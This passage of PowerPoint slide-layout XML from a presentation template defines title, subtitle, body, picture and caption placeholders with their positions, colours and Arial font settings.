          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7227066" y="445811"/>
            <a:ext cx="4468550" cy="5683525"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="180000" tIns="180000" rIns="180000" bIns="180000" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add body copy</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1530968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ogo on dark plum">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent6"/>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C26AD0A-B2DA-4BA8-971E-89A9C370B04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4149377" y="1520825"/>
            <a:ext cx="3893247" cy="3810079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E13ABF-265D-4F81-9B5C-C36A394A06CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17446580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ubtitle, content, text box &amp;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6416599" cy="710639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1213249"/>
            <a:ext cx="6416598" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1628774"/>
            <a:ext cx="6416596" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E461228-2A69-42BE-A4E4-3FAE975C4EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7227066" y="445812"/>
            <a:ext cx="4468550" cy="2693996"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="180000" tIns="180000" rIns="180000" bIns="180000" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add body copy</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35BB7F6E-5153-4780-80FD-C3880708F546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7227066" y="3429001"/>
            <a:ext cx="4471859" cy="2211386"/>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9" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F34B7CA-F8C7-4C5F-BB60-E4395928D429}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7227066" y="5640386"/>
            <a:ext cx="4471859"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105677538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ubtitle, content, solid red text box &amp;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6416599" cy="710639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1213249"/>
            <a:ext cx="6416598" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1628774"/>
            <a:ext cx="6416596" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E461228-2A69-42BE-A4E4-3FAE975C4EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7227066" y="445812"/>
            <a:ext cx="4468550" cy="2693996"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="180000" tIns="180000" rIns="180000" bIns="180000" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add body copy</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35BB7F6E-5153-4780-80FD-C3880708F546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7227066" y="3429001"/>
            <a:ext cx="4471859" cy="2211386"/>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9" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F34B7CA-F8C7-4C5F-BB60-E4395928D429}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7227066" y="5640386"/>
            <a:ext cx="4471859"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21005062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ubtitle, content &amp; large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6416599" cy="710639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1213249"/>
            <a:ext cx="6416598" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1628774"/>
            <a:ext cx="6416596" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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7" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35BB7F6E-5153-4780-80FD-C3880708F546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7227066" y="441325"/>
            <a:ext cx="4471859" cy="5199062"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F34B7CA-F8C7-4C5F-BB60-E4395928D429}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7227066" y="5640386"/>
            <a:ext cx="4471859" cy="488951"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="4D4D4D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="108000" tIns="108000" rIns="108000" bIns="108000"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1000" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add picture caption</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26846907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dividing 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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1213249"/>
            <a:ext cx="11337924" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1628774"/>
            <a:ext cx="5328591" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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8" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB985924-B690-4F6B-A059-A56784949324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1628774"/>
            <a:ext cx="5328591" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
